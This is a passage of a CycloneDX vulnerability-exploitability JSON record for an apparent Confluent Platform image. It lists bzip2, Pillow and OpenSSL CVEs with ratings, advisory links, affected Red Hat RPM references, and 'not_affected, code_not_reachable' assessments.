          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42250",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "bzip2 contains an off\u2011by\u2011one error in the bzip2recover utility. When processing a specially crafted file, the application performs an out\u2011of\u2011bounds write to a global buffer, resulting in memory corruption and a crash (denial of service).\n\nThis issue was fixed in bzip2 patch\u00a035d122a3df8b0cc4082a4d89fdc6ee99f375fe67",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42250"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42250"
        },
        {
          "url": "https://cert.pl/en/posts/2026/05/CVE-2026-42250/"
        },
        {
          "url": "https://inbox.sourceware.org/bzip2-devel/20260528145407.293768-1-mark@klomp.org/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42250"
        },
        {
          "url": "https://sourceware.org/bzip2/"
        },
        {
          "url": "https://sourceware.org/cgit/bzip2/commit/?id=35d122a3df8b0cc4082a4d89fdc6ee99f375fe67"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42250"
        }
      ],
      "published": "2026-05-28T14:16:19+00:00",
      "updated": "2026-06-17T10:47:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.0.6-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42308",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceeding large amount, when Pillow keeps track of the current position, it may lead to an integer overflow. This issue has been patched in version 12.2.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42308"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42308"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pillow/PYSEC-2026-165.yaml"
        },
        {
          "url": "https://github.com/python-pillow/Pillow"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/pull/9518/changes%20%28suspected%20fix%29"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42308"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8399-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42308"
        }
      ],
      "published": "2026-05-09T06:16:09+00:00",
      "updated": "2026-07-24T21:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42765",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: When a partial-chain certificate verification is enabled\ntogether with OCSP response checking for the whole chain, a NULL dereference\nwill happen if the verified chain does not have a self-signed trusted anchor,\ncrashing the process.\n\nImpact summary: A NULL pointer dereference can trigger a crash which leads to a\nDenial of Service for an application.\n\nWhen performing OCSP response checking for certificates in the verification\nchain, the code always tries to access the next certificate as the issuer.\nThere is a check for a self-signed certificate. However with the partial\nchain verification enabled when the chain does not have a self-signed trusted\nanchor, the issuer will be NULL for the last certificate in the chain. A NULL\npointer dereference then happens.\n\nThis issue affects only applications which enable both OCSP verification\nof the certificate chain (X509_V_FLAG_OCSP_RESP_CHECK_ALL) and partial\nchain verification (X509_V_FLAG_PARTIAL_CHAIN) in the certificate\nverification. Both flags are disabled by default. For that reason, we have\nassigned Low severity to the issue.\n\nNo FIPS modules are affected by this issue as the affected code is outside\nthe OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42765"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42765"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/14340b7fa1d444615486bc137014b064e64ec334"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eb345da18ce2216b2f3ade9c2bc23e068487fa97"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42765"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42765"
        }
      ],
      "published": "2026-06-09T17:17:07+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
